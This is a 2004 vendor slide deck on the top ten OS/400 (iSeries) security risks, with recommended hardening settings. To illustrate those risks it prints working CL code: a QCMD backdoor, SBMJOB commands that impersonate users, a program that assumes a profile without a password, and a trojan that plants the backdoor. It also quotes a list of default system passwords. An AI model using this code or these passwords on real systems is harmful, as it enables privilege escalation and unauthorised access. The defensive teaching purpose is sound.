Sie sind auf Seite 1von 50

Definitive iSeries Security

P R E S E N T A T I ON

Top 10 OS/400
Security Risks
October 2004

John Earl
Chief Technology Officer

The PowerTech Group


www. powertech.com
john.earl@ powertech.com

Copyright (c) 1999 - 2002 The Powertech


Group

Copyright & Disclaimer


This information is meant for the edification of the OS/400 user
community. It is my sincere desire that you use this information
to your advantage and make your systems more secure with it.
As with any software modification, you should test the impact of
these recommendations before implementing them on
production systems. Because every system is potentially
different, neither I nor The PowerTech Group can assume any
responsibility for any adverse effects of improperly tested
implementations.
And finally, to protect our copyright (and out of common courtesy to
the author), we respectfully request that you do not reproduce
this material in any advertisement, web-site, or other printed
format without the expresses written consent of the copyright
holder.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

PowerTech/IBM Relationship
> Multi-level

Executive through developer

> Partner Programs

System Mgmt Partner Group


Advanced Development Partner

> Business with Global Services

Worldwide agreement with IGS


IGS recommends PowerTech with engagements
Installed in IBM outsourced clients

> Installed in IBM San Jose, Rochester, NY,


www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

HACKERS!!!

www.powertech.com

or

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

The Biggest Threat


to your Corporate Data
Your Company

2003 PowerTech Group, Inc. All rights reserved.

Enterprise Security Evolution

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

Source Code for a Secret Terrible


and Dastardly Hacking Program

> Source code for program: QSYS/QBACKDOOR:


PGM
CALL QCMD
ENDPGM

> When compiled to adopt a powerful users authority, this


program is dangerous without limits.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

Top 10 OS/400 Security Risks


Agenda
Introduction
The Top 10
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.

User Identity Theft


Powerful Users
System Value Weaknesses
Library and Library List Problems
The Open Door Policy
Promiscuous Object Ownership
Command Interface Abuse
Trojan Horses
No Audit Ability
Unprotected Network Access

Conclusion
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

User
Identity Theft

> There are 5 well known ways to steal


an OS/400 User IDs.

From the difficult to the easy, they are:


1.
2.
3.
4.
5.

www.powertech.com

Use an OS/400 Job Description to masquerade as


the user
Use the Submit Job Command (SBMJOB) to
masquerade as the user
Use IBM APIs to Switch to the user (no password
required)
Sniff Network traffic to find clear text passwords
Beg, borrow, steal or guess their password

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

User
Identity Theft

Use an OS/400 Job Description to


masquerade as the user.

A JOBD that has a User ID specifically attached to it


represents the ability to run a job as that user. Without
knowing the users password.
This exposure is only for those systems running at OS/400
QSECURITY level 30 and lower.

At QSECURITY level 30 and lower, the user needs only *USE (Read) authority to the
Job Description.

Example:
SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM
PGM(QSYS/QBACKDOOR)
SRCFILE(MYLIB/QCLSRC)
OPTION(*NOSRC) GENOPT(*NOLIST)
USRPRF(*OWNER) LOG(*NO)
ALWRTVSRC(*NO) AUT(*ALL)))
JOB(REPORT) JOBD(QGPL/QBATCH) USER(*JOBD)

> Solution? Move to QSECURITY level 40 or


higher.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

User
Identity Theft

Use the Submit Job Command (SBMJOB) to


masquerade as the user

The SBMJOB command allows the submitter to


specify the name of another user, and have the
submitted job run using the assumed identity. All
that is required is *USE (Read) authority to the
target User Profile Object.
Example:
SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM
PGM(QSYS/QBACKDOOR)
SRCFILE(MYLIB/QCLSRC)
OPTION(*NOSRC) GENOPT(*NOLIST)
USRPRF(*OWNER) LOG(*NO)
ALWRTVSRC(*NO) AUT(*ALL)))
JOB(REPORT) JOBD(QGPL/QBATCH) USER(SALLY)

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

10

User
Identity Theft

Use IBM APIs to Switch to the user (no


password required)

The following code will allow me to become


someone else without knowing their password.

Program QSYS/QASSUME

!
!
!
d
e
r
o
s
n
Ce

PGM PARM(&USER)
DCL
&USER
*CHAR 10
DCL
&HANDLE
*CHAR 10
DCL
&ERROR
*CHAR
4
CHGVAR %BIN(&ERROR)
0
CALL
'QSYGETPH
PARM(&USER *NOPWD &HANDLE &ERROR)
CHGVAR %BIN(&ERROR)
0
CALL
'QWTSETP PARM(&HANDLE &ERROR)
ENDPGM

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

11

User
Identity Theft

Sniff Network traffic to find clear text


passwords

Several Protocols submit User IDs and


Passwords in clear text

www.powertech.com

Among them are FTP, Telnet, and older forms of Client


Access and PC Support

Minimize use of the legacy OS/400 Sign-on


Screen (QDSIGNON)
Set the Client Access Bypass Signon flag to yes,
and the OS/400 system value for QRMTSIGN to
*VERIFY
Use VPNs when communicating over un-secure
networks

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

12

User
Identity Theft

Beg, borrow, steal, or guess their


password.

Password Protection is the Best Defense!

www.powertech.com

AS/400 requires a password to in order to access


A solid password policy will prevent most breaches from the
outside and from nefarious insiders too.
Dont send passwords via email, or over un-secured networks.
Require that passwords be changed at regular intervals.
Dont EVER use default passwords

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

13

User
Identity Theft

All of the Default passwords are well known!


Subject: alt.2600 FAQ (1/3) #18/
From:
quinny@bigfoot.com
Forums: alt.2600
Message segment 18 of 63 - Get Previous / Next Segment - Get All 63 Segments
AS/400
~~~~~~
qsecofr
qsysopr
qpgmr
ibm
ibm
ibm
qsecofr
qsecofr
qserv
qsvr
secofr
qsrv

qsecofr
qsysopr
qpgmr
password
2222
service
1111111
2222222
qserv
qsvr
secofr
ibmce

/* master security officer */


/* system operator
*/
/* default programmer
*/

(Get All 63 Segments)


www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

14

User
Identity Theft

Prevent Trivial Passwords:

At a minimum, set these system values:


System Value Name

Value

QPWDEXPITV
QPWDMINLEN
QPWDRQDDGT
QPWDRQDDIF

90
6
1
5

www.powertech.com

Description
90 Days
6 Character Minimum length
Require a digit
Unique in 10

Dont go too wild with password rules (the QPWD*


system values), or your users wont remember
their passwords!

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

15

Powerful
Users

> Users can be made more powerful through


the granting of OS/400 Special Authorities

Special Authorities can trump OS/400 object


level authorities.
A USER WITH *ALLOBJ CAN READ, CHANGE, OR DELETE
ANY OBJECT ON THE SYSTEM.
A USER WITH *SPLCTL CAN READ, CHANGE, OR DELETE
ANY SPOOL FILE ON THE SYSTEM.
A USER WITH *JOBCTL CAN VIEW, CHANGE, OR STOP ANY
JOB ON THE SYSTEM (INCLUDES ENDSBS AND PWRDWNSYS)
A USER WITH *SAVSYS CAN READ OR DELETE ANY OBJECT
ON THE SYSTEM.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

16

Powerful
Users

> What do special authorities do?

*ALLOBJ - ALL authority to every object on


the system Game Over!
*AUDIT - Authority to manipulate system
auditing values.
*IOSYSCFG - Authority to create and modify
communications to the system.
*JOBCTL- Authority to control other users
jobs.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

17

Powerful
Users

>What do special authorities do?

*SAVRST - Authority to Save,Restore, and


remove any object on the system.
*SECADM - Authority to change Profiles and
Passwords
*SERVICE - Authority to use the system
service tools.
*SPLCTL - *ALLOBJ authority for spool files.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

18

System Value
Weaknesses

There are several system values must be


set properly to protect your system.

Set the System Values to their most protective


setting and then toggle them off/on as
needed.
Monitor System Values to detect and alert you
whenever they are changed.

Ensure that those system values are changed back


Monitor for Toggle off / Toggle On conditions
Monitor what is done while System Values are toggled
off

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

19

System Value
Weaknesses

Signon Control
Regulate signon to prevent attacks

QDSPSGNINF

*DSCJOB

Maximum invalid signon attempts allowed.

Disable User after N invalid signon attempts

QRMTSIGN

When job is timed out, disconnect job and show signon screen.

QMAXSGNACN

30

Time out a screen after 30 idle minutes.

QMAXSIGN

QINACTMSGQ

Display the signon information screen.

QINACTITV

*VERIFY

Allow user to bypass legacy signon screen.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

20

System Value
Weaknesses

Malicious Programs
Prevent Malicious programs from being
loaded to your system by setting these
system values:

QALWOBJRST

Force object conversion on restore.

QVFYOBJRST

*NONE

Do not allow sensitive program restore.

QFRCCVNRST

Signed objects must be valid upon restore.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

21

System Value
Weaknesses

Operating System Integrity Setting


Use these Settings to ensure system
Integrity at all times:

QSECURITY =

QSECURITY supports 5 levels

40 or 50

10 = Physical Security
20 = Password Security
30 = Resource Security
40 = Operating System Security
50 = Enhanced Operating System Security

Do not allow programs to bypass OS security.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

22

Libraries and
Library Lists

Libraries are collections of data that a user


can access.

If a user has *EXCLUDE authority to a library,


they cannot access anything in that library.
If a user has *USE authority to a library, they can
read change or delete objects in that library

Assuming they have authority to the object itself.

A user with *USE plus *ADD authority can place


new objects into a library
A user with *ALL authority can delete the library

Libraries are your first line of defense.

www.powertech.com

Grant users no more than *USE authority to


production libraries
Specify *EXCLUDE for sensitive libraries
info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

23

Libraries and
Library Lists

A library list specifies the order in which objects and files


are searched for.
The ability to place objects in a library that is higher on the
library list (assuming *USE plus *ADD capability),
represnts the ability to skirt many security designs

Example:

If the library list contains LIBA, LIBB, and LIBC


And security checking program PROGZ exists in LIBC
And useer Fred has *USE + *ADD authority to LIBA
User Fred could place a bogus version of PROGZ into LIBA that bypasses
security

Solution:

Users only need *USE authority to libraries in their library list.


This is especially true of libraries on the system portion of the
library list (System Value QSYSLIBL)

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

24

The Open
Door Policy

> Every OS/400 object specifies some kind of


authority for a user called *PUBLIC?

WHO IS *PUBLIC?
Any user of this computer who does not have explicit
authority to a given object.

In the old days *PUBLIC was Everyone in my


company.
Then as we networked to more and more systems, *PUBLIC
became every one you do business with (Customers,
Vendors, Partners, etc.)
With virtually every network connected to every other
network (its called The Internet!), *PUBLIC could be
anyone in the WORLD that can connect to your network!!!
In a perfect world, *PUBLIC should have little or no
authority to production applications.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

25

The Open
Door Policy

> At a maximum, Business Application users


need no more than;

*USE Authority to static objects such as:

Programs, Display Files, Print Files, Work Management Objects, etc. All
static objects (those that do not contain data in one form or another) will work
for users that have only change.

*CHANGE Authority to dynamic objects such as:

Data Files, Data Areas, Data Queues, Message Queues, etc. Those things that
regularly change as a matter of normal business.

> But ideally, dont give *PUBLIC even read


(*USE) authority to anything that you wouldnt
want published on the Internet tonight.
> Look at the QCRTAUT system value to see
what authority *PUBLIC is given by default to
newly created objects.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

26

Promiscuous
Object Ownership

> Promiscuous Object Ownership is where


end users belong to a group profile that
owns all of the application objects.

This plan makes it easy to administer security


because everyone has all rights based solely
on their membership in the ownership group.
This plan often assumes that all application
access will take place through a predefined
menu interface thereby restricting what a
user can actually see and change.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

27

Promiscuous
Object Ownership

> Why is this a problem?

Users are no longer locked into green screen


interfaces and dumb terminals.
There are numerous ways of getting at the
data
Command

Line access
DFU, DBU, EZView and other Data manipulation tools
QUERY/400, SQL, and othjer query tools
Others???

Make sure that youve got all the back doors


(and Windows!) covered as well.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

28

Command Line
Interface Abuse

> The ability to execute commands allows a


user to skirt traditional menu limitations.

Commands can be entered in a variety of


ways:
1.
2.

3.
4.
5.
6.

OS/400 Command line (Call QCMD)


OS/400 Screens that display a command line
(WRKOUTQ, WRKWTR etc.), or other applications
with hidden command line access keys.
Through the use of the Attention Key.
Using FTP to issue a command remotely.
Using DDM to issue a command remotely.
Using Client Access to issue a command remotely.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

29

Command Line
Interface Abuse

> Control users access to commands by

Use the Limited Capability parameter (LMTCPB) on


the OS/400 user profile to limit items 1-4 on the
previous page.

Beware that items 5 and 6 on the previous page do


not adhere to the LMTCPB parameter limitations

Assuming OS/400 V4R2 or higher.

Use an exit program to limit DDM and Client Access commands.

Some users will still require Command line access.

Programmers, Operators, Vendors, and selected Power Users

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

30

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

Command Line
Interface Abuse

2003 PowerTech Group, Inc. All rights reserved.

31

A Trojan
Horse
> Program QSYS/QTROJAN

www.powertech.com

QSYS/DCL
&ALLOBJ *CHAR 10
QSYS/ DCL
&COUNT *DEC
(3 0)
QSYS/ DCL
&SPCAUT *CHAR 100
QSYS/ DCL
&START *DEC
(3 0) VALUE(1)
QSYS/MONMSG CPF0000

d
e
r
o

!
!
!

QSYS/RTVUSRPRF SPCAUT(&SPCAUT)
LOOP: IF (&COUNT *LE 10)
QSYS/ CHGVAR VAR(&ALLOBJ) VALUE(%SST(&SPCAUT &START 10))
QSYS/IF
COND(&ALLOBJ = 'ALLOBJ') THEN(DO)
QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) +
OPTION(*NOSRC) GENOPT(*NOLIST) +
USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) +
AUT(*ALL)
QSYS/RETURN
QSYS/ENDDO
QSYS/CHGVAR VAR(&COUNT) VALUE(&COUNT + 1)
QSYS/CHGVAR VAR(&START) VALUE(&START + 10)
QSYS/GOTO LOOP

s
n
e
C

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

32

Trojan
Horses

> A malicious person who hides a Trojan Horse on your


system will (generally) have the following goals:

Have the program assume high levels of authority


Be able to run the program at will
Hide the program from the system administrators
Have the program execute often, and by a variety of users.

> An IBM exit point program that can be deleted (and/or


replaced) by someone other than the System
Administrator represents an opportunity for a Trojan
Horse.
> *USE authority is sufficient to run these exit programs. Anything more, and
you are at risk of introducing a Trojan Horse.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

33

Trojan
Horses

> System Values

QATNPGM
QPWDVLDPGM
QRMTSIGN
QSTRUPPGM

> Network Values

PCSACC
DDMACC

(WRKSYSVAL)
- Attention program
- Password validation program
- Remote sign-on control
- Startup program

(CHGNETA)
- PC Support exit point
- DDM exit point

> Registration Info (WRKREGINF)

ADDEXITPRG

www.powertech.com

- Add Exit Program

Hundreds of program opportunities here

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

34

Trojan
Horses

> Message Files

DFTPGM parameter allows a default handling program.

10s of thousands of Message Queues.

> Subsystems

(CHGMSGD)
(CHGSBSD)

Routing and Communication Entries contain program


names.

> Database Triggers (ADDPFTRG)

Use PRTTRGPGM to monitor trigger usage

> Command Exit Programs

Monitor command exits (V4R5) and validation programs

www.powertech.com

Over 2000 OS/400 commands

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

35

No Audit
Ability

> If you had a security problem, would you know?

Who did it?


What happened?
When it happened?
How it was done?
How to stop it from happening again?

> What if the data was not damaged, but only stolen?

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

36

No Audit
Ability

> In order to prevent security breaches, you


must first be able to detect them.
> Use the OS/400 security auditing journal
(QAUDJRN) to help determine where your
security stands.

Why?
Its free (from IBM)
Its a comprehensive gathering tool
Its an irrefutable source of historical events.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

37

No Audit
Ability

> Turn on OS/400 Security Auditing by typing:


CHGSECAUD

QAUDCTL(*AUDLVL)
+
QAUDLVL(*AUTFAIL *CREATE *DELETE +
*JOBDTA *NETCMN *OBJMGT +
*OFCSRV *OPTICAL *PGMADP +
*PGMFAIL *PRTDTA*SAVRST +
*SECURITY *SERVICE *SPLFDTA +
*SYSMGT )
+
INLJRNRCV(SECURLIB/AUDRCV0001)

> This will generate a lot of audit trails


> Use tools to sift through the audit trails to find
important events.
> If at all possible, save all security journal receivers.
> Make sure QAUDENDACN is *NOTIFY.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

38

10

Unprotected
Network Access

> Some facts about iSeries Security

DB2/400 database is integrated with the operating system.


Users have all of the authority that their group IDs carry,
and in many purchased software applications, Group IDs
own the application data.
OS/400 ships with all of its TCP/IP services turned on.
These network services provide authorized users access to
application data.
If you do not have Exit Programs in place, you likely are at
risk of sharing OS/400 data with every user on your network
PowerLock NetworkSecurity is an iSeries host based
Access Control and Monitoring software package that
protects application data from too-powerful users.

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

39

10

Unprotected
Network Access

> Most AS/400s rely on menu security

It was easy to build


Its the legacy of many S36 and S/38 applications

> Most menu Security designs assume:

All access is through the application menu.


No users have command line access.
Query access is limited or denied completely.
That the user is a member of the group that owns
the objects. Or
*PUBLIC has Broad access to the data

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

40

10

Unprotected
Network Access

> Menu Security is no longer relevant in a


networked environment.

Users are all using PCs not dumb terminals


PCs have sophisticated data access tools like
FTP, ODBC, Remote Command and more.
End users are much more sophisticated many
hit the workforce with a pre-existing familiarity with
these tools.

> Dont believe that the 5250 green screen is


the End of your security responsibility.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

41

10

Result: Too Much Access

Application Menu
CRM

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

42

10

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

Unprotected
Network Access

2003 PowerTech Group, Inc. All rights reserved.

43

Unprotected
Network Access
Some of the network access methods
10

CLIENT ACCESS/400*

Windows Network
Neighborhood
Shared Folders
Shared Printers

FTP

Get File transfer


Put File Transfer
Remote Command
ODBC
Data Queue access

NetServer

Get File
Put File
Delete File
Delete Library
Remote Command

DDM

Copy File
Remote Command
DRDA
Shared Folders
Etc.

There are over 250 access points to an iSeries database!


www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

44

10

Unprotected
Network Access

How do you regulate network access to data?


> Implement Exit Programs on network access points like
FTP, ODBC, DDM, etc.
Exit Programs can
Will protect systems that are reliant solely on menu security.
Can be used to limit what trading partners can see when they access
your system.
Monitor access that normally fly beneath your radar
Stops unwanted activity even when youre not around.
Provide defense in depth security beyond traditional controls

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

45

10

Unprotected
Network Access

What is an exit point anyway?


A point in a process where control can be passed to a usersupplied program. The user-supplied program can usually
perform processing that overrides or compliments the
processing done by the main process.

Main program

IBMs FTP Server


1. User requests data:
2. FTP Server calls exit
program
3. Exit Program returns result

Continue processing...
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

User specified
exit program
Analyze request &
return result
(pass/fail)
2003 PowerTech Group, Inc. All rights reserved.

46

10

iSeries Network Access with


Network Security in Place
E
X
I
T

FTP Server
TELNET Server
Database Server
P
DDM Server
R
SQL Server
DRDA Server
File xfer Server

O
G
R
A
M

Network Security software that controls and monitors


access to the iSeries through the network interfaces.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

47

10

Prevent Data Theft and Loss

DISTRIBUTORS

EMPLOYEES

Provides:
Visibility to Network
activity
Control of Network
Activity
SUPPLIERS

Security Monitoring
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

48

Conclusions

> Security on OS/400 doesnt just


happen, you have to make it happen.
> OS/400 has the best Security tools
available, so lets use them
> You cant play in e-business unless you
guard against network access
> If you are compromised, will you know?
> Secure network access points before
someone else discovers the exposure.
www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

49

Thank You

Contact Info:
John Earl
Chief Technology Officer
The PowerTech Group
john.earl@powertech.com
253.872.7788 x302

www.powertech.com

info@powertechgroup.com

Copyright (c) 1999 - 2002 The Powertech


Group

2003 PowerTech Group, Inc. All rights reserved.

50